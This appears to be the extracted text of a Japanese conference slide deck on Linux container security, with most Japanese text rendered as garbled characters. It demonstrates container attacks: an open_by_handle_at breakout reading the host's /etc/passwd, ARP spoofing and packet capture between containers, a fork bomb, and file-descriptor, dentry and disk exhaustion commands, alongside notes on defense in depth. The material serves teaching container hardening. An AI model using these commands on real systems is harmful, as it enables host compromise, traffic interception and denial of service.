    … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false
  112. έΠύϏϦςΟΛ%301 $ cat sample3.haco … config.capabilities.allow :all config.capabilities.drop "cap_sys_admin" config.capabilities.drop

    "cap_net_raw" …
  113. ݖݶ͕ͳ͍ͷͰ࣮ߦෆՄೳ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 ping: icmp

    open socket: Operation not permitted root@sample1:/# mount /dev/sda1 /mnt/ mount: permission denied
  114. TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ

    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘
  115. PQFO@CZ@IBOEMF@BU wϑΝΠϧϋϯυϧ͕ࢀর͢ΔϑΝΠϧΛ։͘γεςϜίʔϧ •CAP_DAC_READ_SEARCH wϑΝΠϧͱσΟϨΫτϦͷಡΈग़͠ͷݖݶνΣοΫΛόΠύε͢Δ wCJOENPVOUͨ͠σΟϨΫτϦͱಉ͡ϑΝΠϧγεςϜʹ͋Δ೚ҙͷϑΝΠϧ ʹΞΫηεՄೳ

  116. PQFO@CZ@IBOEMF@BU int open_by_handle_at( int mount_fd, struct file_handle *handle, int flags);

    struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ };
  117. PQFO@CZ@IBOEMF@BU struct file_handle { unsigned int handle_bytes; /* Size of

    f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ }; ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸
  118. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1, // 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };
  119. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 57824 Links: 1 $ haconiwa start sample4.c root@sample1:/# vim read_passwd.c // Change ex) 57824= e1 e0 .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };
  120. PQFO@CZ@IBOEMF@BU root@sample1:/# gcc read_passwd.c root@sample1:/# ./a.out root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin …

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false
  121. ϗετͷγΣϧΛऔΔ root@sample1:/# gcc breakout.c root@sample1:/# ./a.out $ sudo haconiwa start

    demo1.haco
  122. εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ w TFDDPNQ͕#ZQBTT͞Εͯ΋$BQBCJMJUZͰ๷͙

  123. ίϯςφͷωοτϫʔΫ

  124. $POUBJOFS/FUXPSL wLXD͸σϑΥϧτઃఆͰ͸ ϒϦοδ͕࡞੒͞ΕΔ eth0 lxdbr0 veth0 eth0 veth0 eth0 $POUBJOFS

    $POUBJOFS #SJEHF 
  125. #SJEHF/FUXPSL $ ip addr show dev lxdbr0 4: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP>

    mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff inet 10.152.207.1/24 scope global lxdbr0 valid_lft forever preferred_lft forever inet6 fd2e:8281:6de5:9841::1/64 scope global valid_lft forever preferred_lft forever inet6 fe80::281a:c0ff:fed1:4b28/64 scope link valid_lft forever preferred_lft forever
  126. $POUBJOFS/FUXPSL wίϯςφΛϗεςΟϯά͍ͯ͠Δ ৔߹ɺΠϯλʔωοτ͔Βτϥ ϑΟοΫΛड͚Δ w΋͠ίϯςφ಺ͷϢʔβʔ͕τϥ ϑΟοΫΛ๣डͰ͖ͨΒʜʁ 4500 0088 7f79 4000

    4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000
  127. "314QPPpOH w"31ͷੑ࣭Λར༻ͯ͠ϧʔςΟϯ άΛมߋ͢Δ w"31ςʔϒϧ ΞυϨεରরද Λ ৴͡ΔࣄͰ੒Γཱ͍ͬͯΔ wԠ౴Λِ૷͢Δ͜ͱʹΑΓޡͬͨ "31ςʔϒϧΛԚછͤ͞Δ͜ͱ͕ Ͱ͖Δ

    4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000
  128. "315BCMF vagrant@ubuntu-xenial:~$ lxc list attacker | RUNNING | 10.128.193.110 (eth0)

    victim | RUNNING | 10.128.193.231 (eth0) vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0 # attacker ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 # victim ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3
  129. ίϯςφͱૄ௨͕औΕΔ͜ͱΛ֬ೝ vagrant@ubuntu-xenial:~$ lxc exec attacker bash root@test1:~# ping 10.128.193.231 #

    victim ip PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data. 64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms ^C --- 10.128.193.231 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms
  130. "314QPPpOH root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null & [1]

    1619 root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null & [2] 1620
  131. "315BCMF vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on

    lxdbr0 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3
  132. ύέοτΛΩϟϓνϟ͢Δ root@attacker:~# tcpdump -i any -vv -w test.pcap vagrant@ubuntu-xenial:~/shared$ curl

    10.128.193.231
  133. औಘͨ͠ύέοτΛݟͯΈΔ $ lxc file pull attacker/root/test.pcap ./ $ tcpdump -X

    tcp port 80 -r test.pcap 0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101 E...!&@.?..g.... 0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be .....(.P........ 0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb .....].......... 0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1 0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238 .1..Host:.10.128 0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41 .193.231..User-A 0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e gent:.curl/7.47. 0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a 0..Accept:.*/*.. 0x0080: 0d0a ..
  134. ͦͷଞͷ"UUBDL4VSGBDF

  135. ENFTHͷόοϑΝϦϯάݺͼग़͠ͱফڈ root@sample1:/# dmesg [ 311.470895] EXT4-fs (sda1): error count since

    last fsck: 28 [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691 [ 311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449 … root@06399a7a8814:/# dmesg -C root@06399a7a8814:/# dmesg
  136. OFHBUJWFEFOUSZͷେྔੜ੒ root@sample1:/# perl -e 'stat("/$_") for 1..100000000’ vagrant@ubuntu-xenial:~$ sudo slabtop

    Active / Total Objects (% used) : 4172542 / 4182249 (99.8%) Active / Total Slabs (% used) : 197606 / 197606 (100.0%) Active / Total Caches (% used) : 78 / 122 (63.9%) Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%) Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 4050564 4050564 100% 0.19K 192884 21 771536K dentry
  137. 'JMF%FTDSJQUPSΛେྔੜ੒ w։͚ΔϑΝΠϧσΟεΫϦϓλͷ਺ʹ͸ ্ݶ͕͋Γɺ/proc/sys/fs/file- maxͰ֬ೝͰ͖Δɻ wίϯςφͷதͷϓϩηε͕͜ͷ஋ͷ਺ ͚ͩϑΝΠϧσΟεΫϦϓλΛ։͘ͱɺ VJEΛڞ༗͍ͯ͠Δ৔߹͸ϗετଆʹ΋ Өڹ͕ੜ͡Δɻ for(i=0; i=99198;

    i++) { sprintf(buf, “/tmp/%d", i); int fd = open(buf, O_CREAT); if( fd == -1 ){ printf("max fd %d\n”, i); break; } } for(;;);
  138. GPSLCPNC $ :(){ :|: & };: $ for i in

    {1..9999}; do sleep infinity & done
  139. σΟεΫ༰ྔ $ fallocate -l 20g big_file • ίϯςφʹσΟεΫ༰ྔ੍ݶ͕ͳ͍৔߹͸େ͖ͳϑΝΠϧΛ࡞੒͢Δ͜ͱͰɺ ϗετͷσΟεΫ༰ྔΛѹഭͤ͞Δ͜ͱ͕Ͱ͖Δɻ $

    dd if=/dev/zero of=tempfile bs=20GB count=10
  140. ·ͱΊ IUUQTqJDLSQ;[

  141. ·ͱΊ w-JOVYίϯςφ͸ෳ਺ͷηΩϡϦςΟػߏʹΑͬͯकΒΕ͍ͯΔ wεΠενʔζϞσϧʢFYTFDDPNQ͕΍ΒΕͯ΋$BQBCJMJUZ͕͋Δʣ wઃఆʹෆඋ͕͋Δͱίϯςφ͔Βϗετɺଞͷίϯςφ΁ӨڹΛٴ΅͢ w-9$΍%PDLFSͳͲ͸σϑΥϧτͰ͜ΕΒͷ߈ܸΛ๷͙ઃఆΛࢪ͍ͯ͠Δ w΋͔ͨ͠͠Βෆඋ͕͋Δ͔΋Ͷ  w$7&

  142. ܅΋ϖύϘͰಇ͔ͳ͍͔ʁ ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU